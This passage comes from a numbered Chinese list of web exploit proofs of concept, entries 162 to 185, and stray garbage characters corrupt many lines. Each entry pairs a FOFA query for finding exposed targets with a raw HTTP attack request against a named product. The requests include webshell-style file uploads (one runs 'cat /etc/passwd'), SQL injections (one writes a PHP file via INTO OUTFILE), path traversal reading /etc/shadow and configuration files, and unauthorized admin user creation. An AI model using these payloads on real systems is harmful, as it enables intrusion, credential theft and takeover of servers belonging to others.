e; H( H2 k' y2 y- [% Q( a7 d2 _: jFOFA: app="和丰山海-数字标牌") w7 }$ X v* t N* \" `% O( B! V
POST /QH.aspx HTTP/1.1
$ S2 E7 B4 v7 {; d% j( ?: QHost: x.x.x.x; k1 F# B3 z$ p, f: N9 a# g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
$ N, j, v. F- G$ L: oConnection: close
& ~1 @3 I7 l/ ~% }8 m- uContent-Length: 5834 u V: F1 C0 u0 G4 V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
?% ? k( Z, P* U. e. ~% [1 iAccept-Encoding: gzip
& e1 F9 B5 m* v' s
. a+ D9 w5 ]7 A) ?) y3 W2 g8 R------WebKitFormBoundaryeegvclmyurlotuey
! ~2 Z1 u) H# |9 R2 nContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"5 b$ C/ a& f2 c; P( T% v7 s3 F$ h
Content-Type: application/octet-stream
" N1 u4 _" ^- i0 w' ^7 r- K8 b) E9 Y: a+ i/ Z. b T. g( v
<% response.write("ujidwqfuuqjalgkvrpqy") %>3 Z. v' e8 q* x: @! |) t# N" `
------WebKitFormBoundaryeegvclmyurlotuey
! {6 H4 A% k+ J7 k. jContent-Disposition: form-data; name="action") t* m' s) a5 i2 u: |
0 U% I9 ]' b, T& Z/ @upload
' v( f# ]! N p# u! v------WebKitFormBoundaryeegvclmyurlotuey3 ?* v( g% u9 R! s& P ?/ {
Content-Disposition: form-data; name="responderId"
9 B, V( k) C6 b, k) X6 {: [2 Z% l* v/ L" C4 T2 e
ResourceNewResponder* f2 f/ T. N- a. |
------WebKitFormBoundaryeegvclmyurlotuey
3 x, R6 N% b: Q* V- g4 mContent-Disposition: form-data; name="remotePath"6 ]4 p/ _2 O7 S0 f! {2 f9 a7 A) q& \4 `
: }! ?: x- ]5 @
/opt/resources- H, |1 F7 B7 T3 ?# G/ \+ _7 t
------WebKitFormBoundaryeegvclmyurlotuey--
) P3 p/ v9 O3 O' V
" M6 o/ n |7 c* C' b9 [' }9 Q- ^9 j$ F1 `9 E/ R
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
8 l; f7 M+ p6 s, h$ f: f; e
" X! L+ ?6 i s, i8 C5 n. y6 ?163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
# s( j0 m9 q+ q5 TFOFA: icon_hash="-795291075"" }4 {% S0 V* j
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
0 R/ P, P. \$ s- UHost: x.x.x.x3 r: D8 [3 l; ~7 l! L( C. Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36: M" M( B7 U5 }7 F( T5 ^3 ]- \, K9 Y
Connection: close8 r. ^2 m) b* h* h
Content-Length: 2932 F( @; N7 {1 }, K, h
Accept: */*
0 H; I' ^9 X5 v" U( B1 xAccept-Encoding: gzip, deflate
9 _7 U; a" C+ T2 j7 o, F) QAccept-Language: zh-CN,zh;q=0.9
; P4 Y- @* y5 D) {Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod! f: W4 i1 v/ H& U
3 d) m9 i8 Y( M( @, u" @) i2 U------iiqvnofupvhdyrcoqyuujyetjvqgocod4 S W1 e6 I7 r
Content-Disposition: form-data; name="name"; N* P: m3 z2 ?4 t# I. e& P
1 o' J, {- W! x) B' u2 e" h# b
1.php, c2 q* E) c. |' g# T
------iiqvnofupvhdyrcoqyuujyetjvqgocod% L+ A' B" e6 E% N+ G/ k/ u
Content-Disposition: form-data; name="upfile"; filename="1.php" f) b9 o& F% D
Content-Type: image/jpeg
+ ?# P1 j @. P5 s3 r
6 |$ f7 C0 t- ]! |* {; L$ D! |$ n2 Frvjhvbhwwuooyiioxega
7 J7 p% }" [) v2 c! h------iiqvnofupvhdyrcoqyuujyetjvqgocod--
$ U9 X0 y r, H7 _7 @8 @* L, ~) K5 Y7 ]7 x S$ g
$ U& ~+ ?5 B$ U3 {- c" a164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
" Q2 N$ q% l2 Z. s7 L k4 Q9 HFOFA: title="智慧综合管理平台登入"
; e: d0 {: h/ e. o, E( ~7 ^POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1) N% j4 O2 f2 r* `' J; p9 B
Host: x.x.x.x; y' d- u, }8 x+ i/ I6 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0- m. U) [2 Y% o. f' Z" I2 \ Q |( }
Content-Length: 288
N) ]7 t! N( n% m1 }Accept: application/json, text/javascript, */*; q=0.014 M; T3 F" |! D) J8 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
0 J; G( P# K1 `$ Z% y+ o4 ]% ~2 cConnection: close
( @1 d% M; {: |+ R u( YContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
& q9 H/ [+ C& |; R' C& NX-Requested-With: XMLHttpRequest
/ w P9 D7 }" y: pAccept-Encoding: gzip- [# S% [' d. j7 c: p% k. J
F. b+ E! N( A8 I
------dqdaieopnozbkapjacdbdthlvtlyl0 h; i/ F" v$ s2 B6 P- e' H* s, @
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
6 \1 f7 z$ n1 t1 R* D/ H! j" G3 _4 F- NContent-Type: image/jpeg) c# p1 ~( d0 K m+ X: l5 j7 Z
6 w0 w6 f5 D$ l( V% p B1 ]3 X/ C
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
3 ?6 V" |' l9 L! b5 Y------dqdaieopnozbkapjacdbdthlvtlyl--. V! X; z* Q. T7 n
! }+ M; j1 j. L7 w7 I4 K/ g6 [
9 }/ z2 {. E4 U5 ?8 j7 M
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
$ w+ [& b ^3 F `
7 ?3 c% `2 z; a/ T; ~165. OrangeHRM 3.3.3 SQL 注入* \) O1 M8 r" o, E) l
CVE-2024-36428
+ `+ E) T: i @% k( BFOFA: app="OrangeHRM-产品"" ^' }1 k4 k+ N: |: Y4 m
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END)) u ]0 H. z- _
5 ^+ f# k' @- B! s' a" `3 z
% \) ]. d; T3 l! ~166. 中成科信票务管理平台SeatMapHandler SQL注入% H T% i+ ?# i& i" [, K
FOFA:body="技术支持:北京中成科信科技发展有限公司"
; n& q- F+ b) r9 _- b+ Q( \6 GPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1; F, W- E v1 K# K& ~+ w' }+ h4 t
Host:
: \% B% y. Y& ~- T+ w9 D7 yPragma: no-cache
; l) `% |% l- n! f; r o. mCache-Control: no-cache
( t# n' s. ^7 n& P% t# k$ J' e% DUpgrade-Insecure-Requests: 1; S* N3 _* D9 f! s+ L* v k0 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
% W# B3 q. ?) M3 g$ i0 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: V( a: s6 v2 Y: A( f/ g" vAccept-Encoding: gzip, deflate
0 j$ u w% b* E2 PAccept-Language: zh-CN,zh;q=0.9,en;q=0.8/ Y2 _5 t, V0 y1 k
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
( m: V/ W7 T8 N" f- I! }( GConnection: close3 }/ O' r9 k3 W5 a. ? y A
Content-Type: application/x-www-form-urlencoded) p2 x* L7 \" s% C* P
Content-Length: 89
+ n1 F$ M* j% q2 v- r
% w- K a0 P! jMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
/ Z' J: X. T; Z" K
5 ^* O% P4 |( d" [
* y1 |: G. G5 N8 C5 P( @# ]1 j L167. 精益价值管理系统 DownLoad.aspx任意文件读取
- }$ Y6 t. o8 ]9 _; }' jFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"9 e& U9 _" W) n, a5 R/ L
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
# L! r9 [) J) J) rHost:6 x3 F- o' @5 \* Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 r; U1 _4 [7 T; H0 vContent-Type: application/x-www-form-urlencoded
! Q& {+ ~7 ?# N$ [: h- b EAccept-Encoding: gzip, deflate& K' G4 Y9 }, a7 G/ @
Accept: */*% X! B2 a1 T/ k
Connection: keep-alive) n& J! R& S9 F5 b4 C& z& `2 K& l
4 Y A. V. ~, Y/ P, N3 `# b/ |. g
) p8 H O' e) W168. 宏景EHR OutputCode 任意文件读取
- R: p6 C* i9 `5 h f6 VFOFA:app="HJSOFT-HCM" O) k) r/ z \! q# i$ l8 ?$ Y
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
( P" s5 e- w2 H4 n3 M! i, EHost: your-ip( s" \3 h" R. P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
: v* R3 ~: \4 Q4 C1 Z9 j! mContent-Type: application/x-www-form-urlencoded
$ @6 Y9 ?1 d/ n% ?0 QConnection: close
! `2 D& o+ J- z2 o
7 U0 e$ t* h. Q9 ^. ^, X+ c, Q7 q1 H3 _# {
# x5 T4 p* D) n9 \- z* x
169. 宏景EHR downlawbase SQL注入% y; c0 L5 I. i; @9 S
FOFA:app="HJSOFT-HCM"
: p/ }8 F. d6 t: |, M/ i$ eGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1) a4 u& z2 B3 Y; |# i8 h9 r
Host: your-ip
h- X1 A: k1 D' Q! z0 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 V0 P1 e* A: y' s- T2 K2 K3 u- c
Accept: */*/ [) ?( X4 O: M9 b. _1 k
Accept-Encoding: gzip, deflate
! `, v8 w) u: h& v; S6 y! |4 D9 L5 g& iConnection: close/ M+ A( O' O- J% M4 C
# {. I2 T/ H& A* z$ Z- b' q' ^4 J% v: h) n6 a i
& ]! s0 N: F6 I! n1 _- p' R
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
0 b. a% I! y, V. S# y9 o" \2 HFOFA:body="/general/sys/hjaxmanage.js"% n8 i. O& q/ t F1 R6 ~
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.12 Q& ]# C! E. f0 Y
Host: balalanengliang
, }) U# e# @( T4 p/ s! B# `User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! }$ K2 z' N/ z5 t9 \Content-Type: application/x-www-form-urlencoded
o, u( f2 s8 [2 }$ Z& G% c4 E
1 C- a2 D6 m! t. a1 ?$ dfilename=../webapps/ROOT/WEB-INF/web.xml2 E8 r1 L4 U4 i- ]- `" H
% p0 ^( y. `$ I* r$ j& ~- e% o
- Y+ u! f! T6 { ?( k% ~
171. 通天星CMSV6车载定位监控平台 SQL注入" N# u `9 }" i' j; d1 G7 D- \
FOFA:body="/808gps/"' E: |: S, S9 |$ N
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1* q$ w/ {* [$ Z
Host: your-ip5 F, m+ s6 k Q: ~* B$ g8 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.00 f+ `! n" p+ U" g4 l
Accept: */*
, i2 c' W! `* _ ?6 EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 n# Z1 {" u9 IAccept-Encoding: gzip, deflate
" G$ S+ j7 D, u! C: L$ Q$ bConnection: close
- Q' A) E: d2 J$ ]; F, C
8 m8 u3 X/ ]9 d3 M$ R: t+ `8 [; R# k3 q2 @
, z0 A) e5 |% A' l' j
172. DT-高清车牌识别摄像机任意文件读取
7 E9 K. g3 h% S7 ?5 \FOFA:app="DT-高清车牌识别摄像机"; q0 v. L" _/ M3 N2 O# {" ]
GET /../../../../etc/passwd HTTP/1.1
: a& A _ k7 ^/ _+ |0 e2 e* g2 THost: your-ip# i/ U* v# y2 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' {5 Y* G+ ^7 _: E( [/ G; S- oAccept-Encoding: gzip, deflate
9 D) ~5 |5 E- ?' J* n" h* ^Accept: */*2 D( a2 H2 b! ~$ C+ i; @! ]
Connection: keep-alive
# z0 ?( _) [1 O A: K! m+ d% }- z7 _* i/ Y# J1 Q
9 M% [6 c& a1 q( J5 H
+ A' {8 r$ J% l% j0 Z173. Check Point 安全网关任意文件读取& [" Y) W- C! A' ~1 V% f) y( s7 Y7 G
CVE-2024-24919
' {8 s4 k. q, U+ O6 h: o$ z3 s- W7 GFOFA:app="Check_Point-SSL-Network-Extender") D4 r3 s! @% g$ S% n2 F* S1 B: }
POST /clients/MyCRL HTTP/1.1) M7 d- w! x1 W
Host: your-ip
. ~9 B% N" G0 A) N# d! V2 QContent-Type: application/x-www-form-urlencoded- _) m; c I2 [& n' l3 ]/ W
6 U L# O' O' J& w0 \
aCSHELL/../../../../../../../etc/shadow# v! X: h4 C- I1 O
9 M. A" r* M) Y5 g7 B6 p3 h
! `" p7 H$ {, N% q* |3 i* Q
( _+ v: ]3 A# e7 ^174. 金和OA C6 FileDownLoad.aspx 任意文件读取: D& L _( {; Y# P% G6 R9 a
FOFA:app="金和网络-金和OA"
! w5 L# C# q/ [1 o8 H7 v3 x% aGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1" J4 j# o b# Z" _) U3 w
Host: your-ip9 B, P8 b* L; f4 @: ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& i2 E! }) y s1 w) _) m$ dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 @4 T9 w4 p8 lAccept-Encoding: gzip, deflate, br: c- m( ?# W7 Y+ c
Accept-Language: zh-CN,zh;q=0.9
0 d. C! U/ W3 l7 a- `% bConnection: close* f' p* W+ W( N- H R5 x
$ {0 A& w, [; F) M
$ G1 x8 L2 }% m0 Z4 G g, C3 @
- T X! ?% U( r175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
* t. k+ O, K( dFOFA:app="金和网络-金和OA"
1 y/ @4 x! E0 h* XGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.16 Z8 U) Q- N O# i$ h, o7 A
Host:! n; x( E; C0 q5 `
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ E; o. t* ]) W$ R; L/ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. o/ f( Y# F+ i# |: n' s0 f( Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( u- o. ]) X/ e; q, h" g2 r! i, e
Accept-Encoding: gzip, deflate
# ~' {5 v+ N- |- L% P* zConnection: close( `+ e' T6 `, g. x8 n6 d- n
Upgrade-Insecure-Requests: 1, k& ]1 m" w3 Q
% }/ P: ~! a8 _3 h- Z, U: I$ Z/ Z( N* A+ M/ R. q& j: L! t
176. 电信网关配置管理系统 rewrite.php 文件上传/ z8 r4 a. e* d) N; y v, }/ d3 Z
FOFA:body="img/login_bg3.png" && body="系统登录"
+ D- F& S1 S4 f& X9 P" _POST /manager/teletext/material/rewrite.php HTTP/1.1! d) S/ b" d) V; K( c' Z
Host: your-ip
l9 {9 n4 d: x4 a& zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 U$ |- }. D6 t' T: i6 M8 i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
% j! J3 _$ q% O, g4 ~% i( tConnection: close
5 @! ?, S3 X$ x$ k4 c7 O5 _4 v+ T2 S9 y" W+ r5 b2 _! _
------WebKitFormBoundaryOKldnDPT
& ]7 |8 |4 T/ U" VContent-Disposition: form-data; name="tmp_name"; filename="test.php"5 z3 t. X* O# J$ _, F+ p$ f
Content-Type: image/png* n3 ]) k! X3 B2 G% {6 k
" P6 L4 e# C* w d2 I
<?php system("cat /etc/passwd");unlink(__FILE__);?>
' z6 z" i6 P" D2 K) h, E& A------WebKitFormBoundaryOKldnDPT, R' ]; a& E+ V2 i5 n
Content-Disposition: form-data; name="uploadtime"
4 ^' L, y1 \! K* Z7 f 3 b# U0 Y4 b* q) ]8 e( w0 w
& W* r f0 ]( r2 A& _2 P
------WebKitFormBoundaryOKldnDPT--6 t- N* M& a- ^( @5 K, H
# s \- t+ r- ^7 Q: g5 X8 | x$ c4 W6 B3 a! W" {% |3 h
" C" @9 C- b+ w8 F177. H3C路由器敏感信息泄露" o; T$ O: k& O3 ]( f+ w
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg9 {3 c E% c9 {6 {4 ?% I# c2 m
/userLogin.asp/../actionpolicy_status/../M60.cfg
" G' s5 M1 t2 v0 l/ b( f3 x$ t0 v- D/userLogin.asp/../actionpolicy_status/../GR8300.cfg. J1 l" Z1 m& {) Y# w7 }
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
& M0 a0 D" P+ Q; s8 w/userLogin.asp/../actionpolicy_status/../GR3200.cfg
. p0 L' W& ]9 a2 L. n/userLogin.asp/../actionpolicy_status/../GR2200.cfg: J& {* J- ~/ J( K2 p+ H
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg" H$ |( z) ]& Q
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
; I0 |7 K1 h8 z+ N! A# v8 v5 w/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg' o0 k# D* d9 R! X |
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
1 ^5 j3 E/ z2 d/userLogin.asp/../actionpolicy_status/../ER5200.cfg& @6 J# J& G* @, N
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
9 D$ S* W7 f/ u( C2 H' A, b7 p; _/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
& p4 j& q4 w; N4 B% o/ F/userLogin.asp/../actionpolicy_status/../ER3260.cfg* c" l; l+ a. v8 N, `4 H
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg S+ O+ O8 S7 k1 O4 Q
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
! e( a* P# G* Q4 O0 T/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/ k2 n Z+ f7 X, n. P* ]( M/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
n" M+ O4 g' @% B9 C3 ]/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
' w& ~4 j% C6 v9 ]) {* A+ J/ u7 o/userLogin.asp/../actionpolicy_status/../ER3100.cfg
4 W7 z0 z5 p/ \4 n5 h! B/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg- H9 W" l3 _9 o# m; g: Z3 X$ x
2 D3 B5 k7 b x2 [- a3 ~1 d4 i0 P
. ]2 w" b! i7 o7 m2 E3 f
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
' z( n4 ^/ @# [; U: x. lFOFA:header="/selfservice"( K/ J/ e3 E" y. P( v4 \* ?% `
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
) s: w8 l$ c4 ?/ j# P1 l0 g2 QHost:
4 ]8 ^2 ^9 p. @& V, rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: D! @1 K! w9 x' c/ E, i( Y9 x
Content-Length: 252
% b2 ?# i6 Y( F" tAccept-Encoding: gzip, deflate- I: o# P- W# U8 X7 Q* t9 `
Connection: close9 ^1 ?% u) T% }# ]6 b. g
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l; O& g x7 k+ }! ]0 R3 Q: l
-----------------aqutkea7vvanpqy3rh2l# V) A* `% y& N. b
Content-Disposition: form-data; name="12234.txt"; filename="12234"
: \/ R3 y& r( sContent-Type: application/octet-stream3 u2 t" h: d% E$ _$ x' c
Content-Length: 255
& ~4 s S) _0 p2 N1 L2 C5 E# `3 [) y0 d' m
12234$ U! I1 a5 B I5 K! i) f2 l L. q
-----------------aqutkea7vvanpqy3rh2l--8 f- d2 `! s" f' h! W% Q
& I, j9 M+ E; S) j- c/ E
/ I* Y6 }; d5 Z) l {
GET /imc/primepush/%2e%2e/flex/12234.txt
2 r3 F% |, ~ |# j% f& {4 ]: p9 i* B7 e9 j7 d5 }% ?
! V6 N) M# A( A0 X( N
179. 建文工程管理系统存在任意文件读取3 }% b3 y8 s2 K7 N$ e
POST /Common/DownLoad2.aspx HTTP/1.1
. U9 }; i) Q; AHost: {{Hostname}}
& p9 \* P" Y1 G' a GContent-Type: application/x-www-form-urlencoded
1 W) b; s# s3 S. ^4 _9 C5 _& FUser-Agent: Mozilla/5.0
# p" U X1 q- ]
1 T: t1 [! P- ]; Z9 rpath=../log4net.config&Name=
9 }! s# u: X) b6 V8 m" Q) ~' }1 r3 ?
H. @% x, t9 U180. 帮管客 CRM jiliyu SQL注入+ U: Q/ `; M7 l% }% d
FOFA:app="帮管客-CRM"
1 ]* J$ a! W1 T+ NGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1( T3 U* f2 L f; H9 d
Host: your-ip
. g1 @3 F+ p2 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 E" \9 x. | k5 ?! J" D* g7 P# t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: t0 k1 P! Z. o$ v' e w9 K( M
Accept-Encoding: gzip, deflate/ N( ]/ w$ h: i$ t- s" a% d
Accept-Language: zh-CN,zh;q=0.9
; R" E$ U& [. S+ a" l8 L; Y1 }Connection: close1 n3 }: O% s* {/ b) d/ l% ?3 c7 E
$ P( x0 [& i/ B3 T1 y
% E3 g. ~5 @+ h7 ]% T/ \181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 b) K. q s) i! H4 WFOFA:"PDCA/js/_publicCom.js"4 E' e0 P, z+ [
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1 u! r4 w2 ?# H9 z3 Q( N7 e) o& I
Host: your-ip1 p- H9 N" Y$ H+ H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36$ X$ F% W3 R# a, F3 R9 B6 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; l4 A* n& ~" ]7 R$ TAccept-Encoding: gzip, deflate, br
1 e8 ]' H0 F+ P- uAccept-Language: zh-CN,zh;q=0.91 _- m1 r& i) l
Connection: close* i# b% ]3 Z1 `" {7 k U
Content-Type: application/x-www-form-urlencoded/ Y5 n5 Q6 D' \3 v5 ]7 I5 w* h1 m; Z% X
9 b- ~( _& B' f9 ?6 ` f4 ^4 q5 z0 ^6 B* m, h+ [1 x+ j
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
) F6 z9 x( T5 Z; s
' S3 F4 m2 p; X
! H) F6 \& q% o1 }1 O7 D182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
( H% T" i' U9 Z1 r/ B5 X. bFOFA:"PDCA/js/_publicCom.js"& j- D9 I8 x# I9 P( V7 F* G
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1) N' D$ L+ v. }5 [. m1 m
Host: your-ip1 Y% N+ [$ i5 Y/ D. t. A) y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* k/ z: U- @1 y8 L9 P& q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( y7 X" k, i3 b! T. eAccept-Encoding: gzip, deflate, br8 F6 d7 i& Y8 b9 C/ Z1 b
Accept-Language: zh-CN,zh;q=0.95 O9 J4 t7 s0 L' l0 s
Connection: close
4 f/ k3 P% n2 V) P! x/ {Content-Type: application/x-www-form-urlencoded
, T% V- V- T: F9 N8 e3 ~! H/ a% O7 O3 V3 u S
8 K n8 b0 ~% D1 l% y# I
username=test1234&pwd=test1234&savedays=1
0 J$ s5 o' S! f4 h8 Y1 Z4 U
# x' T( c {5 f" L5 f0 b W2 S/ [) a: y# |2 r
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入2 d9 }! E. u1 _: {: |' N: `
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
- u# m9 @2 A% \/ hGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1( ]) l7 a$ ]/ Z( n# g* v7 V; w$ Y
Host: your-ip
# `2 [2 }2 E9 F O5 O/ u1 JUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
7 L0 k4 i$ G+ B! r- H2 ]2 bAccept-Charset: utf-8; ]( V% N" E* p1 Z& K
Accept-Encoding: gzip, deflate
' u$ Z$ j* T; vConnection: close! L# u5 K7 I; m8 `- ^
' t) `" d. z+ ?$ P" U6 E& \0 n" N# Z( ?# K: o
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加- ~5 ]2 @2 }) l) j( B
FOFA:server="SunFull-Webs"- k+ n& I% z- ^ B4 p
POST /soap/AddUser HTTP/1.1! T( R: `! h4 k$ P
Host: your-ip( ^' o1 \ |+ a' ^
Accept-Encoding: gzip, deflate
( r6 z# `1 L ~5 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; u2 _: t+ C" p1 y2 a% M Y9 hAccept: application/xml, text/xml, */*; q=0.01. g1 {9 O5 _* v
Content-Type: text/xml; charset=utf-8
( U( Q2 K1 W/ c9 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' a' W3 S8 y: i# QX-Requested-With: XMLHttpRequest
! M9 x+ y! N' `% g3 D, P" Z [, V, ~
3 m& T% V& ~8 G+ X& s" Y
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
+ S. K4 \ @" J5 `3 m5 a0 o% S3 P
- t2 m+ }8 I d' [* T; J) n$ x& B
185. 瑞友天翼应用虚拟化系统SQL注入
; N \' E% }- f$ I8 r: d$ M" [( W9 u6 gversion < 7.0.5.1( X/ h6 ?# J' ]9 a( ?3 ~7 i2 f4 o
FOFA:app="REALOR-天翼应用虚拟化系统") j8 p$ U W/ d. z6 o& `( M' u
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1+ K. S7 ^8 p5 L* Y- t- [3 u- h3 @
Host: host7 @3 V. z$ o$ y& m8 E
/ n* X2 o3 G, _6 Z
